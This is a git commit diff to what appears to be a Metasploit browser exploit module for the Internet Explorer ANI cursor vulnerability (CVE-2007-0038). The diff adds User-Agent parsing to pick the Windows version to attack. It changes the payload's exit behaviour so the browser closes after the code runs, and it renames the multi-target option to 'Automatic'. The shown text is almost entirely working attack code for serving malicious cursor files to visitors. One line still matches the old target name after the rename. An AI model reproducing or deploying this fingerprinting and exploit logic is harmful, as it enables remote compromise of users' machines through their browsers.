Automatic target detection based on the user agent
git-svn-id: file:///home/svn/framework3/trunk@4600 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f0fcedf728
commit
775d8bc95b
|
@ -55,8 +55,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
# Cause the shellcode to exit silently
|
||||
'EXITFUNC' => 'seh',
|
||||
# Cause internet explorer to exit after the code hits
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -75,7 +75,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
# Use multiple cursor URLs to try all targets at once
|
||||
# This can result in multiple, sequential sessions
|
||||
#
|
||||
[ 'All Targets', { }],
|
||||
[ 'Automatic', { }],
|
||||
|
||||
#
|
||||
# The following targets use call [ebx+4], just like the original exploit
|
||||
|
@ -126,6 +126,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
ros = /.*/
|
||||
|
||||
case request.headers['User-Agent']
|
||||
|
||||
when /Windows (NT |)4\.0/
|
||||
ros = /NT 4/
|
||||
|
||||
when /Windows (NT |)5\.0/
|
||||
ros = /2000/
|
||||
|
||||
when /Windows (NT |)5\.1/
|
||||
ros = /XP/
|
||||
|
||||
when /Windows (NT |)5\.2/
|
||||
ros = /2003/
|
||||
|
||||
when /Windows (NT |)6\.0/
|
||||
ros = /Vista/
|
||||
end
|
||||
|
||||
|
||||
targ = nil
|
||||
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
|
||||
gext = exts[rand(exts.length)]
|
||||
|
@ -138,7 +159,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
mext = ruri =~ /\.(...)$/
|
||||
if (not (mext and exts.include?($1)))
|
||||
|
||||
|
||||
html =
|
||||
"<html><head><title>" +
|
||||
rand_text_alphanumeric(rand(128)+4) +
|
||||
|
@ -147,10 +168,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||
|
||||
if target.name =~ /All Targets/
|
||||
if target.name =~ /Automatic/
|
||||
targets.each_index { |i|
|
||||
next if not targets[i].ret
|
||||
|
||||
next if not targets[i].name =~ ros
|
||||
html << generate_div(gext, i)
|
||||
}
|
||||
else
|
||||
|
@ -201,7 +222,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def generate_ani(payload, target)
|
||||
|
||||
|
||||
# Build the first ANI header
|
||||
anih_a = [
|
||||
36, # DWORD cbSizeof
|
||||
|
|
Loading…
Reference in New Issue